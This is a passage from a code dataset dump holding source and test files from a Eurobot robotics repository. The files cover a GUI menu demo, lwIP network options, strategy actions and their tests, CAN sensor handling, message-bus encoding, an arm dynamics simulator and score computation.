"is_vendor": false,
"language": "C++",
"length_bytes": 1982,
"license_type": "permissive",
"max_line_length": 84,
"num_lines": 88,
"path": "/ugfx_demo/main.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include \"gfx.h\"\n#include \"gui/Menu.h\"\n#include \"gui/MenuPage.h\"\n#include \"gui/Page.h\"\n#include <string.h>\n#include <iostream>\n\nclass TestPage : public Page {\n GHandle button;\n const char* name;\n int counter;\n\npublic:\n TestPage(const char* name)\n : Page()\n , name(name)\n , counter(0)\n {\n }\n\n virtual const char* get_name()\n {\n return name;\n }\n\n virtual void on_enter(GHandle parent)\n {\n GWidgetInit wi;\n\n gwinWidgetClearInit(&wi);\n\n wi.g.show = gTrue;\n wi.g.parent = parent;\n wi.g.width = 100;\n wi.g.height = 50;\n wi.g.y = 10;\n wi.g.x = 5;\n button = gwinLabelCreate(0, &wi);\n gwinSetText(button, \"foobar\", gFalse);\n }\n\n virtual void on_timer()\n {\n char msg[30];\n sprintf(msg, \"x: %02d\", counter);\n counter++;\n gwinSetText(button, msg, gTrue);\n }\n\n virtual void on_event(GEvent* event)\n {\n std::cout << \"click\" << std::endl;\n }\n};\n\nint main(int argc, char* argv[])\n{\n (void)argc;\n (void)argv;\n\n gfxInit();\n gdispClear(GFX_SILVER);\n gwinSetDefaultBgColor(GFX_SILVER);\n\n gwinSetDefaultFont(gdispOpenFont(\"DejaVuSans32\"));\n\n Menu m;\n\n auto move_page = TestPage(\"move\");\n auto odometry_page = TestPage(\"odometry\");\n auto autoposition = TestPage(\"autoposition\");\n auto base_menu = MenuPage(m, \"Base\", &move_page, &odometry_page, &autoposition);\n\n auto index_page = TestPage(\"index\");\n auto pickup_puck = TestPage(\"pickup\");\n auto arm_menu = MenuPage(m, \"Arms\", &index_page, &pickup_puck);\n\n auto align_page = TestPage(\"puck_align\");\n auto pickup_action = TestPage(\"puck_pickup\");\n auto actions = MenuPage(m, \"Actions\", &align_page, &pickup_action);\n auto strat_menu = MenuPage(m, \"Strat\", &actions);\n\n auto root_page = MenuPage(m, \"Robot\", &strat_menu, &base_menu, &arm_menu);\n m.enter_page(&root_page);\n m.event_loop();\n\n return 0;\n}\n"
},
{
"alpha_fraction": 0.6539682745933533,
"alphanum_fraction": 0.7214285731315613,
"avg_line_length": 24.200000762939453,
"blob_id": "3cb8a3dd5f7d99651f5f94d0abd666c1490a36a3",
"content_id": "c96997fa2c94192fd47b1657e58ddb9c8c36ecbd",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 1260,
"license_type": "permissive",
"max_line_length": 62,
"num_lines": 50,
"path": "/master-firmware/src/lwipopts.h",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "/**\n * @file\n *\n * lwIP Options Configuration\n */\n\n#ifndef __LWIPOPT_H__\n#define __LWIPOPT_H__\n\n#include \"priorities.h\"\n\n#define LWIP_DBG_TYPES_ON LWIP_DBG_ON\n#define LWIP_COMPAT_MUTEX_ALLOWED\n\n/* Disabling TCP reduces flash usage by aout 27 kB.*/\n#define LWIP_TCP 0\n\n/* See lwip/src/include/lwip/opt.h for reference. */\n\n#define MEM_ALIGNMENT 4\n\n#define TCPIP_THREAD_STACKSIZE 4096\n#define TCPIP_MBOX_SIZE MEMP_NUM_PBUF\n\n#define LWIP_SOCKET 0\n\n#define DEFAULT_THREAD_STACK_SIZE 4096\n#define DEFAULT_RAW_RECVMBOX_SIZE 4\n#define DEFAULT_UDP_RECVMBOX_SIZE 4\n#define DEFAULT_TCP_RECVMBOX_SIZE 4\n#define DEFAULT_ACCEPTMBOX_SIZE 4\n\n/* Deprecated, use parameter instead */\n/* Set the default IP of each interface */\n#define LWIP_ETHERNET_IPADDR(p) IP4_ADDR(p, 192, 168, 3, 20)\n#define LWIP_ETHERNET_NETMASK(p) IP4_ADDR(p, 255, 255, 255, 0)\n#define LWIP_CAN_IPADDR(p) IP4_ADDR(p, 192, 168, 4, 20)\n#define LWIP_CAN_NETMASK(p) IP4_ADDR(p, 255, 255, 255, 0)\n#define LWIP_GATEWAY(p) IP4_ADDR(p, 192, 168, 3, 1)\n\n/** Use newlib malloc() instead of memory pools. */\n#include <stdlib.h>\n#define MEM_LIBC_MALLOC 1\n#define MEMP_MEM_MALLOC 1\n\n#define ODOMETRY_PUBLISHER_PORT 20042\n#define STREAM_PORT 20042\n#define BUTTON_PRESS_PUBLISHER_PORT 20042\n\n#endif /* __LWIPOPT_H__ */\n"
},
{
"alpha_fraction": 0.664893627166748,
"alphanum_fraction": 0.6702127456665039,
"avg_line_length": 15.588234901428223,
"blob_id": "493aeea4fa6021853b5afa4ce0268b8447ea77ce",
"content_id": "d58368e53121764f66d8aa221830800bb741b6cc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 564,
"license_type": "permissive",
"max_line_length": 46,
"num_lines": 34,
"path": "/master-firmware/src/parameter_port.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <cstdlib>\n#include <error/error.h>\n#include <mutex>\n#include <parameter/parameter_port.h>\n\nstatic std::mutex parameter_lock;\n\nvoid parameter_port_lock(void)\n{\n parameter_lock.lock();\n}\n\nvoid parameter_port_unlock(void)\n{\n parameter_lock.unlock();\n}\n\nvoid parameter_port_assert(int condition)\n{\n if (!condition) {\n ERROR(\"parameter_assert()\");\n }\n}\n\nvoid* parameter_port_buffer_alloc(size_t size)\n{\n return new uint8_t[size];\n}\n\nvoid parameter_port_buffer_free(void* buffer)\n{\n uint8_t* ptr = (uint8_t*)buffer;\n delete[] ptr;\n}\n"
},
{
"alpha_fraction": 0.577375590801239,
"alphanum_fraction": 0.5933635234832764,
"avg_line_length": 24.8984375,
"blob_id": "3611adf28ebb990f8a9f6d8cab08a0926ee98235",
"content_id": "a02f4a7e74ca2468c4fa5f7bc8e48c3a8a745ddc",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 3315,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 128,
"path": "/master-firmware/src/strategy/actions_impl.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <error/error.h>\n#include \"actions.h\"\n#include \"robot_helpers/trajectory_helpers.h\"\n\nbool actions::EnableLighthouse::execute(StrategyState& state)\n{\n (void)state;\n NOTICE(\"Enabling the lighthouse\");\n\n int res;\n\n // Go in front of lighthouse\n NOTICE(\"Going to the lighthouse\");\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_forward_xy_abs(&robot.traj, 525, 300);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to lighthouse: %d\", res);\n return false;\n }\n\n // We go backward to avoid bringing any glasses with us\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_backward_xy_abs(&robot.traj, 225, 400);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to lighthouse: %d\", res);\n return false;\n }\n\n NOTICE(\"Turning toward lighthouse\");\n {\n absl::MutexLock l(&robot.lock);\n trajectory_a_abs(&robot.traj, -90);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not turn to lighthouse: %d\", res);\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_d_rel(&robot.traj, 300);\n }\n trajectory_wait_for_end(TRAJ_FLAGS_SHORT_DISTANCE);\n\n if (position_get_y_double(&robot.pos) > 150) {\n WARNING(\"Could not get close enough to trigger lighthouse...\");\n return false;\n }\n\n NOTICE(\"Lighthouse succesfully turned on\");\n state.lighthouse_is_on = true;\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_d_rel(&robot.traj, -200);\n }\n trajectory_wait_for_end(TRAJ_FLAGS_SHORT_DISTANCE);\n\n return true;\n}\n\nbool actions::RaiseWindsock::execute(StrategyState& state)\n{\n (void)state;\n NOTICE(\"Raising windsock #%d\", windsock_index);\n\n int windsock_x;\n int res;\n\n if (windsock_index == 0) {\n windsock_x = 2770;\n } else {\n windsock_x = 2365;\n }\n\n // TODO: Use proper obstacle avoidance instead\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_xy_abs(&robot.traj, windsock_x - 100, 1500);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to windsock!\");\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_goto_xy_abs(&robot.traj, windsock_x - 100, 2000 - 150);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not go to windsock!\");\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_a_abs(&robot.traj, 0);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not turn to windsock\");\n return false;\n }\n\n {\n absl::MutexLock l(&robot.lock);\n trajectory_d_rel(&robot.traj, 200);\n }\n res = trajectory_wait_for_end(TRAJ_FLAGS_ALL);\n if (res != TRAJ_END_GOAL_REACHED) {\n WARNING(\"Could not move windsock\");\n return false;\n }\n\n state.windsocks_are_up[windsock_index] = true;\n\n return true;\n}\n"
},
{
"alpha_fraction": 0.5853285789489746,
"alphanum_fraction": 0.5858380198478699,
"avg_line_length": 23.848100662231445,
"blob_id": "a07d49716750e7ae88d24edf6b04f1b1a85abdef",
"content_id": "156d7eaa65d0fd2137448f1182ed0dcc16e8395b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1963,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 79,
"path": "/eurobot/arm-simulator/arm_simulator/hamilton.py",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "from copy import deepcopy\n\nimport autograd.numpy as np\nfrom autograd import grad, hessian, jacobian\n\n\nclass System:\n \"\"\"\n Dynamic system simulated using Hamiltonian dynamics and automatic differentiation\n\n Dimensions:\n - m: Cartesian coordinates\n - n: generalized coordinates (proportional to number of degrees of freedom)\n\n Parameters:\n - f: mapping from generalized to Cartesian coordinates [n -> m]\n - M: inertia matrix of the system, expressed in Cartesian coordinates [m * m]\n - U: potential energy of the system as function of generalized coordinates [n -> 1]\n \"\"\"\n\n def __init__(self, f, M, U):\n self.f = f\n self.M = M\n self.U = U\n\n self.J_f = jacobian(f)\n self.H_f = hessian(f)\n self.grad_U = grad(U)\n\n \"\"\"\n Reset the position and velocity\n \"\"\"\n\n def reset(self, q, qdot):\n self.q = q\n self.p = self.K(q) @ qdot\n\n \"\"\"\n Inertia matrix expressed in generalized coordinates\n \"\"\"\n\n def K(self, q):\n return self.J_f(q).T @ self.M @ self.J_f(q)\n\n \"\"\"\n Time-derivative of the generalized coordinates\n \"\"\"\n\n def q_dot(self, p, q):\n return np.linalg.inv(self.K(q)) @ p\n\n \"\"\"\n Time-derivative of the conjugate momenta\n \"\"\"\n\n def p_dot(self, p, q):\n return p.T @ np.linalg.inv(self.K(q)) @ self.H_f(q).T @ self.M @ self.J_f(\n q\n ) @ np.linalg.inv(self.K(q)) @ p - self.grad_U(q)\n\n \"\"\"\n Advance the system through the given time step\n Returns the resulting generalized coordinates and conjugate momenta\n \"\"\"\n\n def step(self, dt):\n dq = self.q_dot(self.p, self.q)\n self.q += dt * dq\n\n dp = self.p_dot(self.p, self.q)\n self.p += dt * dp\n\n \"\"\"\n Query the current state of the system, returns generalized coordinate q\n and conjugate momenta p\n \"\"\"\n\n def state(self):\n return deepcopy(self.p), deepcopy(self.q)\n"
},
{
"alpha_fraction": 0.7247474789619446,
"alphanum_fraction": 0.7247474789619446,
"avg_line_length": 21,
"blob_id": "f92f464b49237877b3fc705ef224c4e0c3011b34",
"content_id": "ba664ef76e9c881dd117fdf91010df98dbadeb00",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 792,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 36,
"path": "/master-firmware/src/strategy/actions_goap.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "/* File containing the GOAP parts for the actions.\n *\n * The parts specific to the robot, which actually moves the robot and so on\n * should go to actions_impl.cpp\n */\n\n#include \"actions.h\"\n\nusing namespace actions;\n\nbool EnableLighthouse::can_run(const StrategyState& state)\n{\n (void)state;\n return true;\n}\n\nvoid EnableLighthouse::plan_effects(StrategyState& state)\n{\n state.lighthouse_is_on = true;\n}\n\nRaiseWindsock::RaiseWindsock(int windsock_index)\n : windsock_index(windsock_index)\n{\n}\n\nbool RaiseWindsock::can_run(const StrategyState& state)\n{\n /* We don't want to retry a windsock which is already up. */\n return !state.windsocks_are_up[windsock_index];\n}\n\nvoid RaiseWindsock::plan_effects(StrategyState& state)\n{\n state.windsocks_are_up[windsock_index] = true;\n}\n"
},
{
"alpha_fraction": 0.7043931484222412,
"alphanum_fraction": 0.70960533618927,
"avg_line_length": 20.317461013793945,
"blob_id": "ee354d771c6d3f3d7fcdab4aef6e899436a1040c",
"content_id": "80bd2156317ec1a0a7e3fd5418aeaca0841c154b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1343,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 63,
"path": "/master-firmware/tests/strategy/test_actions.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <CppUTest/TestHarness.h>\n#include \"strategy/actions.h\"\n\nusing namespace actions;\n\nbool EnableLighthouse::execute(StrategyState& state)\n{\n plan_effects(state);\n return true;\n}\n\nTEST_GROUP (EnableLighthouseTestCase) {\n StrategyState state;\n EnableLighthouse action;\n};\n\nTEST(EnableLighthouseTestCase, CanAlwaysRun)\n{\n CHECK_TRUE(action.can_run(state));\n}\n\nTEST(EnableLighthouseTestCase, EnablesTheLightHouse)\n{\n action.plan_effects(state);\n CHECK_TRUE(state.lighthouse_is_on);\n}\n\nbool RaiseWindsock::execute(StrategyState& state)\n{\n plan_effects(state);\n return true;\n}\n\nTEST_GROUP (RaiseWindsockTestCase) {\n StrategyState state;\n RaiseWindsock far{1}, near{0};\n};\n\nTEST(RaiseWindsockTestCase, FarSockConditions)\n{\n state.windsocks_are_up[1] = false;\n CHECK_TRUE(far.can_run(state));\n\n /* We should not retry a windsock, its dangerous */\n state.windsocks_are_up[1] = true;\n CHECK_FALSE(far.can_run(state));\n}\n\nTEST(RaiseWindsockTestCase, NearSockConditions)\n{\n state.windsocks_are_up[0] = false;\n CHECK_TRUE(near.can_run(state));\n\n /* We should not retry a windsock, its dangerous */\n state.windsocks_are_up[0] = true;\n CHECK_FALSE(near.can_run(state));\n}\n\nTEST(RaiseWindsockTestCase, RaisesSock)\n{\n far.plan_effects(state);\n CHECK_TRUE(state.windsocks_are_up[1]);\n}\n"
},
{
"alpha_fraction": 0.6775751113891602,
"alphanum_fraction": 0.6861587762832642,
"avg_line_length": 34.846153259277344,
"blob_id": "89ec8fbbeb5e8379dd4f46080a852fad89323fdf",
"content_id": "b4bf0ccdb01c83e0fb0c47f2b87393b4e2050deb",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1864,
"license_type": "permissive",
"max_line_length": 103,
"num_lines": 52,
"path": "/master-firmware/src/can/sensor_handler.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <ch.h>\n#include <uavcan/uavcan.hpp>\n#include <cvra/sensor/DistanceVL6180X.hpp>\n\n#include <error/error.h>\n#include \"main.h\"\n#include \"protobuf/sensors.pb.h\"\n#include <msgbus_protobuf.h>\n\nstatic TOPIC_DECL(front_left_topic, Range);\nstatic TOPIC_DECL(front_right_topic, Range);\nstatic TOPIC_DECL(back_left_topic, Range);\nstatic TOPIC_DECL(back_right_topic, Range);\n\nstatic bus_enumerator_t* enumerator;\n\nstatic void sensor_distance_cb(const uavcan::ReceivedDataStructure<cvra::sensor::DistanceVL6180X>& msg)\n{\n int id = msg.getSrcNodeID().get();\n messagebus_topic_t* topic = NULL;\n\n if (id == bus_enumerator_get_can_id(enumerator, \"front-left-sensor\")) {\n topic = &front_left_topic.topic;\n } else if (id == bus_enumerator_get_can_id(enumerator, \"front-right-sensor\")) {\n topic = &front_right_topic.topic;\n } else if (id == bus_enumerator_get_can_id(enumerator, \"back-left-sensor\")) {\n topic = &back_left_topic.topic;\n } else if (id == bus_enumerator_get_can_id(enumerator, \"back-right-sensor\")) {\n topic = &back_right_topic.topic;\n }\n\n if (topic) {\n Range dist;\n dist.distance = msg.distance_mm / 1000.f;\n dist.type = Range_RangeType_LASER;\n messagebus_topic_publish(topic, &dist, sizeof(dist));\n }\n}\n\nint sensor_handler_init(uavcan::INode& node, bus_enumerator_t* e)\n{\n enumerator = e;\n\n messagebus_advertise_topic(&bus, &front_left_topic.topic, \"/distance/front_left\");\n messagebus_advertise_topic(&bus, &front_right_topic.topic, \"/distance/front_right\");\n messagebus_advertise_topic(&bus, &back_left_topic.topic, \"/distance/back_left\");\n messagebus_advertise_topic(&bus, &back_right_topic.topic, \"/distance/back_right\");\n\n static uavcan::Subscriber<cvra::sensor::DistanceVL6180X> distance_sub(node);\n\n return distance_sub.start(sensor_distance_cb);\n}\n"
},
{
"alpha_fraction": 0.6012872457504272,
"alphanum_fraction": 0.6058604121208191,
"avg_line_length": 28.22772216796875,
"blob_id": "6b7dfda093877020e92dead86b165579fed5f9ee",
"content_id": "a166ff544f022f74326594f11b48eedaf6eab4f3",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5904,
"license_type": "permissive",
"max_line_length": 97,
"num_lines": 202,
"path": "/strategy_simulator/msgbus_port.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include \"msgbus_port.h\"\n\n#include \"protobuf/protocol.pb.h\"\n#include <pb_encode.h>\n#include <pb_decode.h>\n#include <msgbus/messagebus.h>\n\nvoid messagebus_lock_acquire(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_mutex_lock(&wrapper->mutex);\n}\n\nvoid messagebus_lock_release(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_mutex_unlock(&wrapper->mutex);\n}\n\nvoid messagebus_condvar_broadcast(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_cond_broadcast(&wrapper->cond);\n}\n\nvoid messagebus_condvar_wait(void* p)\n{\n condvar_wrapper_t* wrapper = (condvar_wrapper_t*)p;\n pthread_cond_wait(&wrapper->cond, &wrapper->mutex);\n}\n\n/** Encodes a given topic's header in the buffer and returns the size.\n *\n * @note returns zero if there was an error.\n */\nstatic size_t encode_topic_header(const messagebus_topic_t* topic, uint8_t* buf, size_t buf_len);\n\n/** Encode a given's topic body in the buffer and returns the size. Uses the\n * provided scratch buffer to hold the topic content while it is being\n * processed.\n *\n * @returns encoded size or zero if there was an error.\n */\nstatic size_t encode_topic_body(messagebus_topic_t* topic,\n uint8_t* buf,\n size_t buf_len,\n uint8_t* scratch,\n size_t scratch_len);\n\nsize_t messagebus_encode_topic_message(messagebus_topic_t* topic,\n uint8_t* buf,\n size_t buf_len,\n uint8_t* scratch,\n size_t scratch_len)\n{\n size_t header_len, body_len;\n\n header_len = encode_topic_header(topic, buf, buf_len);\n\n if (!header_len) {\n return 0;\n }\n\n body_len = encode_topic_body(topic, &buf[header_len], buf_len - header_len,\n scratch, scratch_len);\n\n if (!body_len) {\n return 0;\n }\n\n return header_len + body_len;\n}\n\nvoid messagebus_inject_encoded_message(messagebus_t* bus, uint8_t* buf, size_t len)\n{\n size_t offset = 0;\n pb_istream_t istream;\n messagebus_topic_t* topic;\n\n /* TODO check for out of bounds access */\n (void)len;\n\n /* Get header size */\n istream = pb_istream_from_buffer(buf + offset, MessageSize_size);\n MessageSize header_size;\n if (!pb_decode(&istream, MessageSize_fields, &header_size)) {\n return;\n }\n\n /* Get header */\n TopicHeader header;\n offset = MessageSize_size;\n istream = pb_istream_from_buffer(buf + offset, header_size.bytes);\n if (!pb_decode(&istream, TopicHeader_fields, &header)) {\n return;\n }\n\n topic = messagebus_find_topic(bus, header.name);\n if (topic == NULL) {\n return;\n }\n\n /* Read message size */\n MessageSize msg_size;\n offset = MessageSize_size + header_size.bytes;\n istream = pb_istream_from_buffer(buf + offset, MessageSize_size);\n if (!pb_decode(&istream, MessageSize_fields, &msg_size)) {\n return;\n }\n\n /* Read message */\n offset = 2 * MessageSize_size + header_size.bytes;\n istream = pb_istream_from_buffer(buf + offset, msg_size.bytes);\n\n /* TODO better approach than just a static buffer. 
*/\n static uint8_t obj_buffer[1024];\n topic_metadata_t* metadata = (topic_metadata_t*)topic->metadata;\n if (!pb_decode(&istream, metadata->fields, obj_buffer)) {\n return;\n }\n\n messagebus_topic_publish(topic, obj_buffer, topic->buffer_len);\n}\n\nstatic size_t encode_topic_header(const messagebus_topic_t* topic, uint8_t* buf, size_t buf_len)\n{\n topic_metadata_t* metadata = (topic_metadata_t*)topic->metadata;\n size_t offset;\n size_t max_len;\n\n TopicHeader header;\n MessageSize header_size;\n\n /* First populate information in the header */\n strncpy(header.name, topic->name, sizeof(header.name) - 1);\n header.msgid = metadata->msgid;\n\n /* Then encode header, skipping enough bytes to store the message size before. */\n pb_ostream_t stream;\n offset = MessageSize_size;\n max_len = buf_len - MessageSize_size;\n if (buf_len < MessageSize_size) {\n return 0;\n }\n\n offset = MessageSize_size;\n stream = pb_ostream_from_buffer(&buf[offset], max_len);\n\n if (!pb_encode(&stream, TopicHeader_fields, &header)) {\n return 0;\n }\n\n /* Then prepend the header length message */\n header_size.bytes = stream.bytes_written;\n stream = pb_ostream_from_buffer(buf, MessageSize_size);\n\n if (!pb_encode(&stream, MessageSize_fields, &header_size)) {\n return 0;\n }\n\n return MessageSize_size + header_size.bytes;\n}\n\nstatic size_t encode_topic_body(messagebus_topic_t* topic,\n uint8_t* buf,\n size_t buf_len,\n uint8_t* scratch,\n size_t scratch_len)\n{\n pb_ostream_t stream;\n MessageSize msg_size;\n bool was_posted_once;\n topic_metadata_t* metadata = (topic_metadata_t*)topic->metadata;\n\n if (scratch_len < topic->buffer_len) {\n return 0;\n }\n\n if (buf_len < MessageSize_size) {\n return 0;\n }\n\n was_posted_once = messagebus_topic_read(topic, scratch, scratch_len);\n if (!was_posted_once) {\n return 0;\n }\n\n /* Encode while leaving enough room to write the message length */\n stream = pb_ostream_from_buffer(&buf[MessageSize_size], buf_len - MessageSize_size);\n if (!pb_encode(&stream, metadata->fields, scratch)) {\n return 0;\n }\n\n /* Prepend the encoded topic len. */\n msg_size.bytes = stream.bytes_written;\n stream = pb_ostream_from_buffer(buf, MessageSize_size);\n if (!pb_encode(&stream, MessageSize_fields, &msg_size)) {\n return 0;\n }\n\n return msg_size.bytes + MessageSize_size;\n}\n"
},
{
"alpha_fraction": 0.6314433217048645,
"alphanum_fraction": 0.6688144207000732,
"avg_line_length": 23.25,
"blob_id": "54e96eb9e8ef6a503eef13a4b798859301fbeb44",
"content_id": "c332cce88d28d02bc95d8ebdd60d66d41adb6ad5",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 776,
"license_type": "permissive",
"max_line_length": 108,
"num_lines": 32,
"path": "/master-firmware/tests/test_base_helpers.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include <CppUTest/TestHarness.h>\n\nextern \"C\" {\n#include <base/base_helpers.h>\n}\n\nTEST_GROUP (ABasePositionGetter) {\n const int ARBITRARY_TRACK_LENGTH_MM = 100;\n const int ARBITRARY_ENCODER_TICKS_PER_MM = 10000;\n struct robot_position robot_pos;\n\n void setup() override\n {\n position_init(&robot_pos);\n position_set_physical_params(&robot_pos, ARBITRARY_TRACK_LENGTH_MM, ARBITRARY_ENCODER_TICKS_PER_MM);\n }\n\n void teardown() override\n {\n }\n};\n\nTEST(ABasePositionGetter, returnsPoseOfRobot)\n{\n position_set(&robot_pos, 10, 10, 180);\n\n se2_t pose = base_get_robot_pose(&robot_pos);\n\n DOUBLES_EQUAL(pose.translation.x, 10, 0.1);\n DOUBLES_EQUAL(pose.translation.y, 10, 0.1);\n DOUBLES_EQUAL(pose.rotation.angle, 3.14, 0.1);\n}\n"
},
{
"alpha_fraction": 0.5086782574653625,
"alphanum_fraction": 0.5402759313583374,
"avg_line_length": 24.247190475463867,
"blob_id": "6244b42c0bfeadfe5309f2a5c6509be5ff9c0eef",
"content_id": "6e681051867c77cbe7b05ccbc00cfa39026679f4",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2247,
"license_type": "permissive",
"max_line_length": 87,
"num_lines": 89,
"path": "/tools/plot_demo.py",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "import matplotlib\n\nmatplotlib.use(\"Agg\")\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nTABLE_SIZE = {\"x\": 3000, \"y\": 2000}\nROBOT_SIZE = 245\nARM_LENGTHS = (100, 98)\nARM_OFFSET = {\"x\": -100, \"y\": 0, \"a\": np.pi}\n\n\ndef discrete_circle(center, radius, samples, offset=0):\n return (\n [\n center[0] + radius * np.cos(2 * np.pi * i / samples + offset)\n for i in range(samples)\n ],\n [\n center[1] + radius * np.sin(2 * np.pi * i / samples + offset)\n for i in range(samples)\n ],\n )\n\n\ndef rectangle(a, b):\n return [a[0], b[0], b[0], a[0]], [a[1], a[1], b[1], b[1]]\n\n\ndef rot(angle):\n return np.array([[np.cos(angle), -np.sin(angle)], [np.sin(angle), np.cos(angle)]])\n\n\ndef lever(length, angle):\n return length * np.array([np.cos(angle), np.sin(angle)])\n\n\ndef draw_link(ax, x0, x1, thickness=5):\n ax.plot([x0[0], x1[0]], [x0[1], x1[1]], linewidth=thickness)\n\n\ndef draw_polygon(ax, polygon, fill=True):\n x, y = polygon\n x.append(x[0])\n y.append(y[0])\n if fill:\n ax.fill(x, y)\n else:\n ax.plot(x, y)\n\n\ndef draw_base(ax, pose, robot_size):\n draw_polygon(\n ax, discrete_circle((pose[\"x\"], pose[\"y\"]), robot_size / 2, 6, pose[\"a\"])\n )\n\n\ndef draw_arm(ax, pose, arm, arm_offset):\n shoulder = np.array([pose[\"x\"], pose[\"y\"]]) + rot(pose[\"a\"]) @ [\n arm_offset[\"x\"],\n arm_offset[\"y\"],\n ]\n elbow = shoulder + lever(ARM_LENGTHS[0], pose[\"a\"] + arm_offset[\"a\"] + arm[\"a\"])\n hand = elbow + lever(\n ARM_LENGTHS[1], pose[\"a\"] + arm_offset[\"a\"] + arm[\"a\"] + arm[\"b\"]\n )\n\n draw_link(ax, shoulder, elbow)\n draw_link(ax, elbow, hand)\n\n\ndef draw_robot(ax, pose={\"x\": 0, \"y\": 0, \"a\": 0}, arm={\"a\": 0, \"b\": 0}):\n draw_base(ax, pose, ROBOT_SIZE)\n draw_arm(ax, pose, arm, ARM_OFFSET)\n\n\ndef draw_table(margin=200):\n fig, ax = plt.subplots()\n ax.set_xlim((-margin, TABLE_SIZE[\"x\"] + margin))\n ax.set_ylim((-margin, TABLE_SIZE[\"y\"] + margin))\n draw_polygon(ax, rectangle((0, 0), (TABLE_SIZE[\"x\"], TABLE_SIZE[\"y\"])), fill=False)\n return fig, ax\n\n\nfig, ax = draw_table()\ndraw_robot(\n ax, {\"x\": 1000, \"y\": 1000, \"a\": np.pi / 2}, {\"a\": np.pi / 4, \"b\": -np.pi / 2}\n)\nfig.savefig(\"test.png\")\n"
},
{
"alpha_fraction": 0.5926605463027954,
"alphanum_fraction": 0.6091743111610413,
"avg_line_length": 18.81818199157715,
"blob_id": "1b2fc5bc97578a1d6b73b0330c5c8910b3992c55",
"content_id": "c445b4b62111b7e25a30b0acd516357efde84385",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1090,
"license_type": "permissive",
"max_line_length": 77,
"num_lines": 55,
"path": "/master-firmware/src/strategy/score.cpp",
"repo_name": "SnaKyEyeS/robot-software",
"src_encoding": "UTF-8",
"text": "#include \"score.h\"\n\nstatic int compute_windsocks(const StrategyState& state)\n{\n if (state.windsocks_are_up[0] && state.windsocks_are_up[1]) {\n return 15;\n }\n\n if (state.windsocks_are_up[0] || state.windsocks_are_up[1]) {\n return 5;\n }\n\n return 0;\n}\n\nstatic int compute_lighthouse(const StrategyState& state, bool is_main_robot)\n{\n int score = 0;\n\n /* We get +2 points for the team for having the lighthouse, but only one\n * robot should account for it. */\n if (is_main_robot) {\n score += 2;\n }\n\n if (state.lighthouse_is_on) {\n score += 13;\n }\n\n return score;\n}\n\nstatic int compute_flags(const StrategyState& state, bool is_main_robot)\n{\n if (!is_main_robot) {\n return 0;\n }\n\n if (state.robot.flags_deployed) {\n return 10;\n }\n\n return 0;\n}\n\nint compute_score(const StrategyState& state, bool is_main_robot)\n{\n int score = 0;\n\n score += compute_windsocks(state);\n score += compute_lighthouse(state, is_main_robot);\n score += compute_flags(state, is_main_robot);\n\n return 